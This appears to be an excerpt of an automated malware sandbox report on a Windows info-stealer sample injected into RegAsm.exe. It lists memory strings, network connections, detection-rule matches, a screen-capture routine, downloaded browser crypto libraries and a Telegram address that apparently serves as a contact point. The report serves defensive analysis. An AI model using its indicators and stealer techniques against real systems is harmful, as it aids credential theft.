                  Source: RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                  Source: RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmp, GIJDAFBK.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                  Source: GIJDAFBK.1.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                  Source: RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17e
                  Source: RegAsm.exe, 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                  Source: file.exe, file.exe, 00000000.00000002.1634539577.0000000000A29000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/r1g1o
                  Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: BGCBGCAF.1.drString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: BGCBGCAF.1.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: RegAsm.exe, 00000001.00000002.2107817674.0000000000FB5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmp, 76561199680449169[1].htm.1.drString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                  Source: unknownHTTPS traffic detected: 23.210.138.105:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 95.217.242.142:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.6.204.109:443 -> 192.168.2.4:49753 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.6.204.109:443 -> 192.168.2.4:49756 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49758 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.4:49777 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040FD7F _EH_prolog,memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,1_2_0040FD7F

                  System Summary

                  barindex
                  Source: 0.2.file.exe.a2b000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.a2b000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 0.2.file.exe.a00000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A470700_2_00A47070
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A162940_2_00A16294
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A454AB0_2_00A454AB
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A199960_2_00A19996
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A44A090_2_00A44A09
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A45B870_2_00A45B87
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A44F5A0_2_00A44F5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041A6091_2_0041A609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041B7871_2_0041B787
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041AB5A1_2_0041AB5A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0041CC701_2_0041CC70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19834CF01_2_19834CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198D59401_2_198D5940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19821C9E1_2_19821C9E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198220181_2_19822018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19949A201_2_19949A20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19989CC01_2_19989CC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1982292D1_2_1982292D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198212A81_2_198212A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19822AA91_2_19822AA9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198390001_2_19839000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_199450401_2_19945040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198235801_2_19823580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198B53B01_2_198B53B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_199FD2091_2_199FD209
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_199894301_2_19989430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198C96901_2_198C9690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198DD6D01_2_198DD6D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19821EF11_2_19821EF1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19924A601_2_19924A60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19848D2A1_2_19848D2A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198A81201_2_198A8120
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198A00901_2_198A0090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_199480301_2_19948030
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19823AB21_2_19823AB2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_199604801_2_19960480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198487631_2_19848763
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198847601_2_19884760
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198B87601_2_198B8760
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198486801_2_19848680
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1982251D1_2_1982251D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1984BAB01_2_1984BAB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1982290A1_2_1982290A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1982174E1_2_1982174E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198533701_2_19853370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_199069C01_2_199069C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1993A9001_2_1993A900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1991A9401_2_1991A940
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1982481D1_2_1982481D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1995E8001_2_1995E800
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19823E3B1_2_19823E3B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1982EA801_2_1982EA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1982AA401_2_1982AA40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198219DD1_2_198219DD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19866E801_2_19866E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_199FAEBE1_2_199FAEBE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_19882EE01_2_19882EE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1982209F1_2_1982209F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198AA0B01_2_198AA0B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1991A5901_2_1991A590
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_1984A5601_2_1984A560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198247AF1_2_198247AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_198366C01_2_198366C0
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 00A07080 appears 51 times
                  Source: C:\Users\user\Desktop\file.exeCode function: String function: 00A40EF2 appears 98 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 19821F5A appears 31 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416AF2 appears 98 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 19A006B1 appears 36 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 19823AF3 appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1982395E appears 78 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040249B appears 311 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1982415B appears 125 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 19821C2B appears 47 times
                  Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.file.exe.a2b000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 1.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.a2b000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.a00000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: file.exeStatic PE information: Section: .Shine ZLIB complexity 0.9969358766233766
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@30/23@5/7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040FC40 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_0040FC40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0040F1A8 CoCreateInstance,SysAllocString,SysFreeString,_wtoi64,SysFreeString,SysFreeString,1_2_0040F1A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199680449169[1].htmJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9036:120:WilError_03
                  Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqlx[1].dll.1.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqlx[1].dll.1.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                  Source: BGHJJDGHCBGDHIECBGID.1.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: RegAsm.exe, RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                  Source: RegAsm.exe, 00000001.00000002.2111941345.0000000013AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.1.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.1.dr, softokn3.dll.1.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                  Source: file.exeReversingLabs: Detection: 31%
                  Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                  Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://796299082092352771018332050787432950295397740/
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,13904423073980638453,1715731274265844286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1960,i,9720651213267638284,544210953920903557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,13904423073980638453,1715731274265844286,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
